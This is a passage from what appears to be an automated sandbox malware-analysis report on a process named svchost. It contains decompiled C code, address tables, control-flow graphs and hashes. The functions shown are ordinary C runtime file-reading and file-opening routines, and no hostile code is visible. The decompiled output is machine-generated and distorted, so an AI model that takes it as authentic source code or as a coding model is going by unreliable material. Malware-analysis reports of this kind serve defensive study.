						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E00BD0A25(_t224, _t158);
								E00BD09EB(0);
								E00BD09EB(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E00BD2807(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0xbf6108 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0xbf6108 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E00BD8D71(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E00BCC998(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00BCC9CE())) = 9;
											 *(E00BCC9BB()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E00BD1C82();
												} else {
													_t176 = E00BD1F94();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E00BD1E42(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t104 =  &_v28; // 0xa
									_t231 =  *_t104;
									_t178 =  *((intOrPtr*)(0xbf6108 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00BCC9CE())) = 0xc;
									 *(E00BCC9BB()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E00BD09EB(_t246);
									return _t242;
								}
							}
							L15:
							 *(E00BCC9BB()) =  *_t206 & _t246;
							 *((intOrPtr*)(E00BCC9CE())) = 0x16;
							E00BD1788();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E00BCC9BB()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E00BCC9CE())) = 0x16;
					goto L59;
				} else {
					 *(E00BCC9BB()) =  *_t212 & 0x00000000;
					_t145 = E00BCC9CE();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}



























































                            0x00bd2131
                            0x00bd2138
                            0x00bd2152
                            0x00bd2154
                            0x00bd24bc
                            0x00bd24bc
                            0x00bd24c1
                            0x00bd24c1
                            0x00bd24c9
                            0x00bd24cf
                            0x00bd24cf
                            0x00000000
                            0x00bd24cf
                            0x00bd215a
                            0x00bd2160
                            0x00000000
                            0x00000000
                            0x00bd2168
                            0x00bd2174
                            0x00bd2177
                            0x00bd217a
                            0x00bd217d
                            0x00bd2184
                            0x00bd2187
                            0x00bd218b
                            0x00bd218e
                            0x00bd2191
                            0x00000000
                            0x00000000
                            0x00bd2197
                            0x00bd219a
                            0x00bd21a0
                            0x00bd21ba
                            0x00bd21bc
                            0x00bd24b8
                            0x00000000
                            0x00bd24b8
                            0x00bd21c2
                            0x00bd21c6
                            0x00000000
                            0x00000000
                            0x00bd21cc
                            0x00bd21d0
                            0x00000000
                            0x00000000
                            0x00bd21d7
                            0x00bd21db
                            0x00bd21de
                            0x00bd21e1
                            0x00bd21e6
                            0x00bd21e6
                            0x00bd21e9
                            0x00bd2206
                            0x00bd220b
                            0x00bd220d
                            0x00bd220f
                            0x00bd222f
                            0x00bd2230
                            0x00bd2232
                            0x00bd2235
                            0x00bd2237
                            0x00bd2239
                            0x00bd223b
                            0x00bd223b
                            0x00bd2246
                            0x00bd2248
                            0x00bd224f
                            0x00bd2254
                            0x00bd2257
                            0x00bd225a
                            0x00bd225c
                            0x00bd2281
                            0x00bd2286
                            0x00bd228d
                            0x00bd2290
                            0x00bd2293
                            0x00bd2297
                            0x00bd2299
                            0x00bd229d
                            0x00bd229f
                            0x00bd22a2
                            0x00bd22a5
                            0x00bd22a7
                            0x00bd22aa
                            0x00bd22b1
                            0x00bd22b4
                            0x00bd22b9
                            0x00bd22bc
                            0x00bd22c5
                            0x00bd22c9
                            0x00bd22cc
                            0x00bd22cf
                            0x00bd22d2
                            0x00bd22d8
                            0x00bd22da
                            0x00bd22e3
                            0x00bd22e6
                            0x00bd22e9
                            0x00bd22ec
                            0x00bd22ed
                            0x00bd22f1
                            0x00bd22f7
                            0x00bd2301
                            0x00bd2306
                            0x00bd2316
                            0x00bd231a
                            0x00bd231d
                            0x00bd231f
                            0x00bd2321
                            0x00bd2323
                            0x00bd2325
                            0x00bd232d
                            0x00bd232e
                            0x00bd2331
                            0x00bd2334
                            0x00bd2335
                            0x00bd233b
                            0x00bd2345
                            0x00bd234d
                            0x00bd2350
                            0x00bd235c
                            0x00bd2360
                            0x00bd2363
                            0x00bd2365
                            0x00bd2367
                            0x00bd2369
                            0x00bd236b
                            0x00bd2373
                            0x00bd2374
                            0x00bd2377
                            0x00bd237a
                            0x00bd237a
                            0x00bd237b
                            0x00bd2381
                            0x00bd238b
                            0x00bd238b
                            0x00bd2369
                            0x00bd2365
                            0x00bd2350
                            0x00bd2323
                            0x00bd231f
                            0x00bd2306
                            0x00bd22da
                            0x00bd22d2
                            0x00bd2391
                            0x00bd2397
                            0x00bd2399
                            0x00bd240c
                            0x00bd240c
                            0x00bd2410
                            0x00bd2420
                            0x00bd2426
                            0x00bd2428
                            0x00bd2484
                            0x00bd2484
                            0x00bd248c
                            0x00bd248d
                            0x00bd248f
                            0x00bd24a8
                            0x00bd24ab
                            0x00bd23e8
                            0x00bd23e9
                            0x00000000
                            0x00bd23ee
                            0x00bd24b1
                            0x00000000
                            0x00bd24b1
                            0x00bd2496
                            0x00bd24a1
                            0x00000000
                            0x00bd24a1
                            0x00bd242a
                            0x00bd242d
                            0x00bd2430
                            0x00000000
                            0x00000000
                            0x00bd2432
                            0x00bd2432
                            0x00bd2435
                            0x00bd2438
                            0x00bd243b
                            0x00bd2442
                            0x00bd2447
                            0x00bd2449
                            0x00bd244d
                            0x00bd2468
                            0x00bd246c
                            0x00bd246d
                            0x00bd2470
                            0x00bd2471
                            0x00bd247d
                            0x00bd2473
                            0x00bd2473
                            0x00bd2473
                            0x00bd244f
                            0x00bd244f
                            0x00bd244f
                            0x00bd245a
                            0x00bd245f
                            0x00bd2462
                            0x00bd2462
                            0x00000000
                            0x00bd2447
                            0x00bd239e
                            0x00bd239e
                            0x00bd23a1
                            0x00bd23a8
                            0x00bd23ad
                            0x00000000
                            0x00000000
                            0x00bd23b6
                            0x00bd23bc
                            0x00bd23be
                            0x00000000
                            0x00000000
                            0x00bd23c0
                            0x00bd23c4
                            0x00000000
                            0x00000000
                            0x00bd23d8
                            0x00bd23de
                            0x00bd23e0
                            0x00bd2404
                            0x00bd2407
                            0x00000000
                            0x00bd2407
                            0x00bd23e2
                            0x00000000
                            0x00bd225e
                            0x00bd2263
                            0x00bd226e
                            0x00bd23ef
                            0x00bd23ef
                            0x00bd23ef
                            0x00bd23f2
                            0x00bd23f3
                            0x00000000
                            0x00bd23fb
                            0x00bd225c
                            0x00bd2211
                            0x00bd2216
                            0x00bd221d
                            0x00bd2223
                            0x00000000
                            0x00bd2223
                            0x00bd21eb
                            0x00bd21ee
                            0x00bd21f8
                            0x00bd21f8
                            0x00bd21fb
                            0x00bd21fe
                            0x00000000
                            0x00bd21fe
                            0x00bd21f2
                            0x00bd21f4
                            0x00bd21f6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bd21f6
                            0x00bd21a2
                            0x00bd21a7
                            0x00bd21af
                            0x00000000
                            0x00bd213a
                            0x00bd213f
                            0x00bd2142
                            0x00bd2147
                            0x00bd24d4
                            0x00000000
                            0x00bd24d4

                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID: 0-3907804496
                            • Opcode ID: b990f6ba3f0288ffab4017548619e6efd8b07082cddf11a591c666bbd2c08044
                            • Instruction ID: bff4143a95d9996373329706eddad119105cd9acddae45de1fe72ae26014bfa0
                            • Opcode Fuzzy Hash: b990f6ba3f0288ffab4017548619e6efd8b07082cddf11a591c666bbd2c08044
                            • Instruction Fuzzy Hash: DBC1AF74D04289AFDF119FA8C881BADFBF0EF2A310F1441DAE954A7392E7749941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDBD1F, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 147 bdbd1f-bdbd4f call bdbaf3 150 bdbd6a-bdbd76 call bce783 147->150 151 bdbd51-bdbd5c call bcc9bb 147->151 157 bdbd8f-bdbdd8 call bdba5e 150->157 158 bdbd78-bdbd8d call bcc9bb call bcc9ce 150->158 156 bdbd5e-bdbd65 call bcc9ce 151->156 168 bdc041-bdc047 156->168 166 bdbdda-bdbde3 157->166 167 bdbe45-bdbe4e GetFileType 157->167 158->156 170 bdbe1a-bdbe40 GetLastError call bcc998 166->170 171 bdbde5-bdbde9 166->171 172 bdbe97-bdbe9a 167->172 173 bdbe50-bdbe81 GetLastError call bcc998 CloseHandle 167->173 170->156 171->170 177 bdbdeb-bdbe18 call bdba5e 171->177 175 bdbe9c-bdbea1 172->175 176 bdbea3-bdbea9 172->176 173->156 184 bdbe87-bdbe92 call bcc9ce 173->184 180 bdbead-bdbefb call bce6cc 175->180 176->180 181 bdbeab 176->181 177->167 177->170 190 bdbefd-bdbf09 call bdbc6f 180->190 191 bdbf0b-bdbf2f call bdb811 180->191 181->180 184->156 190->191 198 bdbf33-bdbf3d call bd18f4 190->198 196 bdbf31 191->196 197 bdbf42-bdbf85 191->197 196->198 200 bdbf87-bdbf8b 197->200 201 bdbfa6-bdbfb4 197->201 198->168 200->201 203 bdbf8d-bdbfa1 200->203 204 bdc03f 201->204 205 bdbfba-bdbfbe 201->205 203->201 204->168 205->204 206 bdbfc0-bdbff3 CloseHandle call bdba5e 205->206 209 bdbff5-bdc021 GetLastError call bcc998 call bce895 206->209 210 bdc027-bdc03b 206->210 209->210 210->204
                            C-Code - Quality: 42%
                            			E00BDBD1F(void* __ecx, void* __edx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				void* _t240;
				signed char _t243;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t240 = __edx;
				_t263 = E00BDBAF3(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t263, _t192 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t192 + _t192;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E00BCE783(_t240, _t249, _t264, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t197 = 0;
						_t122 = E00BDBA5E(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00BCE6CC(_t197,  *_t190, _t253);
								_t243 = _v5 | 0x00000001;
								_v5 = _t243;
								_v48 = _t243;
								 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t243;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xbf6108 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t279,  &_v48, _t206 << 2);
									_t134 = E00BDB811(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t281 = _t279 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t225 =  *_t190;
												_t227 = (_t225 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0xbf6108 + (_t225 >> 6) * 4));
												_t87 = _t164 + _t227 + 0x28;
												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t267 = _v44;
										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
										if((_t267 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t267 & 0x7fffffff;
											_t215 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t215 << 2);
											_t246 = E00BDBA5E();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t217 =  *_t190;
												_t219 = (_t217 & 0x0000003f) * 0x30;
												__eflags = _t219;
												 *((intOrPtr*)( *((intOrPtr*)(0xbf6108 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t246;
												goto L31;
											}
											E00BCC998(GetLastError());
											 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
											E00BCE895( *_t190);
											L10:
											goto L2;
										}
									}
									_t270 = _t134;
									goto L22;
								} else {
									_t270 = E00BDBC6F(_t205,  *_t190);
									__eflags = _t270;
									if(__eflags != 0) {
										L22:
										E00BD18F4(__eflags,  *_t190);
										return _t270;
									}
									goto L20;
								}
							}
							_t271 = GetLastError();
							E00BCC998(_t271);
							 *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xbf6108 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00BCC9CE())) = 0xd;
							}
							goto L2;
						}
						_t234 = _v44;
						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
						if((_t234 & 0xc0000000) != 0xc0000000) {
							L9:
							_t235 =  *_t190;
							_t237 = (_t235 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0xbf6108 + (_t235 >> 6) * 4));
							_t33 = _t180 + _t237 + 0x28;
							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00BCC998(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t234 & 0x7fffffff;
						_t239 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t239 << 2);
						_t197 = 0;
						_t253 = E00BDBA5E();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00BCC9BB()) =  *_t186 & 0x00000000;
						 *_t190 = _t264;
						 *((intOrPtr*)(E00BCC9CE())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00BCC9BB()) =  *_t188 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00BCC9CE()));
				}
			}























































                            0x00bdbd1f
                            0x00bdbd42
                            0x00bdbd46
                            0x00bdbd47
                            0x00bdbd47
                            0x00bdbd47
                            0x00bdbd49
                            0x00bdbd4f
                            0x00bdbd6a
                            0x00bdbd6f
                            0x00bdbd72
                            0x00bdbd74
                            0x00bdbd76
                            0x00bdbd95
                            0x00bdbd9c
                            0x00bdbda3
                            0x00bdbda6
                            0x00bdbdb2
                            0x00bdbdb5
                            0x00bdbdbd
                            0x00bdbdbe
                            0x00bdbdc1
                            0x00bdbdc1
                            0x00bdbdc3
                            0x00bdbdc8
                            0x00bdbdca
                            0x00bdbdcd
                            0x00bdbdd5
                            0x00bdbdd8
                            0x00bdbe45
                            0x00bdbe46
                            0x00bdbe4c
                            0x00bdbe4e
                            0x00bdbe97
                            0x00bdbe9a
                            0x00bdbea3
                            0x00bdbea6
                            0x00bdbea9
                            0x00bdbeab
                            0x00bdbeab
                            0x00bdbeab
                            0x00bdbe9c
                            0x00bdbe9f
                            0x00bdbe9f
                            0x00bdbeb0
                            0x00bdbeb3
                            0x00bdbebf
                            0x00bdbec4
                            0x00bdbed0
                            0x00bdbeda
                            0x00bdbede
                            0x00bdbee8
                            0x00bdbeeb
                            0x00bdbef6
                            0x00bdbefb
                            0x00bdbf0b
                            0x00bdbf0e
                            0x00bdbf12
                            0x00bdbf13
                            0x00bdbf19
                            0x00bdbf1e
                            0x00bdbf21
                            0x00bdbf23
                            0x00bdbf25
                            0x00bdbf2a
                            0x00bdbf2d
                            0x00bdbf2f
                            0x00bdbf59
                            0x00bdbf7d
                            0x00bdbf81
                            0x00bdbf85
                            0x00bdbf87
                            0x00bdbf8b
                            0x00bdbf8d
                            0x00bdbf97
                            0x00bdbf9a
                            0x00bdbfa1
                            0x00bdbfa1
                            0x00bdbfa1
                            0x00bdbfa1
                            0x00bdbf8b
                            0x00bdbfa6
                            0x00bdbfb2
                            0x00bdbfb4
                            0x00bdc03f
                            0x00bdc03f
                            0x00000000
                            0x00bdbfba
                            0x00bdbfba
                            0x00bdbfbe
                            0x00000000
                            0x00000000
                            0x00bdbfc3
                            0x00bdbfd5
                            0x00bdbfdd
                            0x00bdbfe0
                            0x00bdbfe1
                            0x00bdbfe4
                            0x00bdbfeb
                            0x00bdbff0
                            0x00bdbff3
                            0x00bdc027
                            0x00bdc031
                            0x00bdc031
                            0x00bdc03b
                            0x00000000
                            0x00bdc03b
                            0x00bdbffc
                            0x00bdc015
                            0x00bdc01c
                            0x00bdbe3f
                            0x00000000
                            0x00bdbe3f
                            0x00bdbfb4
                            0x00bdbf31
                            0x00000000
                            0x00bdbefd
                            0x00bdbf04
                            0x00bdbf07
                            0x00bdbf09
                            0x00bdbf33
                            0x00bdbf35
                            0x00000000
                            0x00bdbf3b
                            0x00000000
                            0x00bdbf09
                            0x00bdbefb
                            0x00bdbe56
                            0x00bdbe59
                            0x00bdbe74
                            0x00bdbe79
                            0x00bdbe7f
                            0x00bdbe81
                            0x00bdbe8c
                            0x00bdbe8c
                            0x00000000
                            0x00bdbe81
                            0x00bdbdda
                            0x00bdbde1
                            0x00bdbde3
                            0x00bdbe1a
                            0x00bdbe1a
                            0x00bdbe24
                            0x00bdbe27
                            0x00bdbe2e
                            0x00bdbe2e
                            0x00bdbe2e
                            0x00bdbe3a
                            0x00000000
                            0x00bdbe3a
                            0x00bdbde5
                            0x00bdbde9
                            0x00000000
                            0x00000000
                            0x00bdbdeb
                            0x00bdbdfa
                            0x00bdbdff
                            0x00bdbe02
                            0x00bdbe03
                            0x00bdbe06
                            0x00bdbe06
                            0x00bdbe0d
                            0x00bdbe0f
                            0x00bdbe12
                            0x00bdbe15
                            0x00bdbe18
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00bdbd78
                            0x00bdbd7d
                            0x00bdbd80
                            0x00bdbd87
                            0x00000000
                            0x00bdbd87
                            0x00bdbd51
                            0x00bdbd56
                            0x00bdbd5c
                            0x00bdbd5e
                            0x00000000
                            0x00bdbd63

                            APIs
                              • Part of subcall function 00BDBA5E: CreateFileW.KERNELBASE(00000000,00000000,?,00BDBDC8,?,?,00000000,?,00BDBDC8,00000000,0000000C), ref: 00BDBA7B
                            • GetLastError.KERNEL32 ref: 00BDBE33
                            • __dosmaperr.LIBCMT ref: 00BDBE3A
                            • GetFileType.KERNELBASE(00000000), ref: 00BDBE46
                            • GetLastError.KERNEL32 ref: 00BDBE50
                            • __dosmaperr.LIBCMT ref: 00BDBE59
                            • CloseHandle.KERNEL32(00000000), ref: 00BDBE79
                            • CloseHandle.KERNEL32(?), ref: 00BDBFC3
                            • GetLastError.KERNEL32 ref: 00BDBFF5
                            • __dosmaperr.LIBCMT ref: 00BDBFFC
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.486093473.0000000000BC1000.00000020.00020000.sdmp, Offset: 00BC0000, based on PE: true
                            • Associated: 0000000B.00000002.486086039.0000000000BC0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486114661.0000000000BE0000.00000002.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486126670.0000000000BEC000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486134901.0000000000BF5000.00000004.00020000.sdmp Download File
                            • Associated: 0000000B.00000002.486143361.0000000000BF7000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_bc0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                            • String ID: H
                            • API String ID: 4237864984-2852464175
                            • Opcode ID: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction ID: aa122a0cb5c0f08a7937fc7ee9ad12e62324c386382d1b40c349dc7eee5bdba9
                            • Opcode Fuzzy Hash: a5581c4fc5a05038f0aae765913ea1366c143109ed0ddfe926e77de34cf14487
                            • Instruction Fuzzy Hash: BDA10532A14145DFCF19DF68DC92FADBBE1EB06320F15019EE815AB392EB718912CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00BDAFBE, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
